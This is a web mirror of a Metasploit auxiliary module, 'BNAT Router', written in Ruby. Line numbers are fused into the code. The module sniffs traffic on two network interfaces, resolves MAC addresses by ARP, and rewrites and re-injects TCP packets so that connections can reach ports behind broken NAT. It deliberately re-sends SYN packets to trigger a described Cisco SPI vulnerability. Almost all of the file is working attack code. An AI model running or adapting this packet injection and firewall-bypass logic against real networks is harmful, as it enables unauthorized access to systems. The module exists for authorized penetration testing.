CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/bnat/bnat_router.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary67def initialize8super(9'Name' => 'BNAT Router',10'Description' => %q{11This module will properly route BNAT traffic and allow for connections to be12established to machines on ports which might not otherwise be accessible.},13'Author' =>14[15'bannedit',16'Jonathan Claudius',17],18'License' => MSF_LICENSE,19'References' =>20[21[ 'URL', 'https://github.com/claudijd/bnat' ],22[ 'URL', 'http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels']23]24)25register_options(26[27OptString.new('OUTINF', [true, 'The external interface connected to the internet', 'eth1']),28OptString.new('ININF', [true, 'The internal interface connected to the network', 'eth2']),29OptString.new('CLIENTIP', [true, 'The ip of the client behind the BNAT router', '192.168.3.2']),30OptString.new('SERVERIP', [true, 'The ip of the server you are targeting', '1.1.2.1']),31OptString.new('BNATIP', [true, 'The ip of the bnat response you are getting', '1.1.2.2']),32])33end3435def run36clientip = datastore['CLIENTIP']37serverip = datastore['SERVERIP']38bnatip = datastore['BNATIP']39outint = datastore['OUTINF']40inint = datastore['ININF']4142clientmac = arp2(clientip,inint)43print_line("Obtained Client MAC: #{clientmac}")44servermac = arp2(serverip,outint)45print_line("Obtained Server MAC: #{servermac}")46bnatmac = arp2(bnatip,outint)47print_line("Obtained BNAT MAC: #{bnatmac}\n\n")4849# Create Interface Specific Configs50outconfig = PacketFu::Config.new(PacketFu::Utils.ifconfig ":#{outint}").config51inconfig = PacketFu::Config.new(PacketFu::Utils.ifconfig ":#{inint}").config5253# Set Captures for Traffic coming from Outside and from Inside respectively54outpcap = PacketFu::Capture.new( :iface => "#{outint}", :start => true, :filter => "tcp and src #{bnatip}" )55print_line("Now listening on #{outint}...")5657inpcap = PacketFu::Capture.new( :iface => "#{inint}", :start => true, :filter => "tcp and src #{clientip} and dst #{serverip}" )58print_line("Now listening on #{inint}...\n\n")5960# Start Thread from Outside Processing61fromout = Thread.new do62loop do63outpcap.stream.each do |pkt|64packet = PacketFu::Packet.parse(pkt)6566# Build a shell packet that will never hit the wire as a hack to get desired mac's67shell_pkt = PacketFu::TCPPacket.new(:config => inconfig, :timeout => 0.1, :flavor => "Windows")68shell_pkt.ip_daddr = clientip69shell_pkt.recalc7071# Mangle Received Packet and Drop on the Wire72packet.ip_saddr = serverip73packet.ip_daddr = clientip74packet.eth_saddr = shell_pkt.eth_saddr75packet.eth_daddr = clientmac76packet.recalc77inj = PacketFu::Inject.new( :iface => "#{inint}", :config => inconfig )78inj.a2w(:array => [packet.to_s])79print_status("inpacket processed")80end81end82end8384# Start Thread from Inside Processing85fromin = Thread.new do86loop do87inpcap.stream.each do |pkt|88packet = PacketFu::Packet.parse(pkt)8990if packet.tcp_flags.syn == 1 && packet.tcp_flags.ack == 091packet.ip_daddr = serverip92packet.eth_daddr = servermac93else94packet.ip_daddr = bnatip95packet.eth_daddr = bnatmac96end9798# Build a shell packet that will never hit the wire as a hack to get desired mac's99shell_pkt = PacketFu::TCPPacket.new(:config=>outconfig, :timeout=> 0.1, :flavor=>"Windows")100shell_pkt.ip_daddr = serverip101shell_pkt.recalc102103# Mangle Received Packet and Drop on the Wire104packet.eth_saddr = shell_pkt.eth_saddr105packet.ip_saddr=shell_pkt.ip_saddr106packet.recalc107inj = PacketFu::Inject.new( :iface => "#{outint}", :config =>outconfig )108inj.a2w(:array => [packet.to_s])109110# Trigger Cisco SPI Vulnerability by Double-tapping the SYN111if packet.tcp_flags.syn == 1 && packet.tcp_flags.ack == 0112select(nil, nil, nil, 0.75)113inj.a2w(:array => [packet.to_s])114end115print_status("outpacket processed")116end117end118end119fromout.join120fromin.join121end122123def arp2(target_ip,int)124config = PacketFu::Config.new(PacketFu::Utils.ifconfig ":#{int}").config125arp_pkt = PacketFu::ARPPacket.new(:flavor => "Windows")126arp_pkt.eth_saddr = arp_pkt.arp_saddr_mac = config[:eth_saddr]127arp_pkt.eth_daddr = "ff:ff:ff:ff:ff:ff"128arp_pkt.arp_daddr_mac = "00:00:00:00:00:00"129arp_pkt.arp_saddr_ip = config[:ip_saddr]130arp_pkt.arp_daddr_ip = target_ip131cap = PacketFu::Capture.new(:iface => config[:iface], :start => true, :filter => "arp src #{target_ip} and ether dst #{arp_pkt.eth_saddr}")132injarp = PacketFu::Inject.new(:iface => config[:iface])133injarp.a2w(:array => [arp_pkt.to_s])134target_mac = nil135136while target_mac.nil?137if cap.save > 0138arp_response = PacketFu::Packet.parse(cap.array[0])139target_mac = arp_response.arp_saddr_mac if arp_response.arp_saddr_ip = target_ip140end141select(nil, nil, nil, 0.1) # Check for a response ten times per second.142end143return target_mac144end145end146147148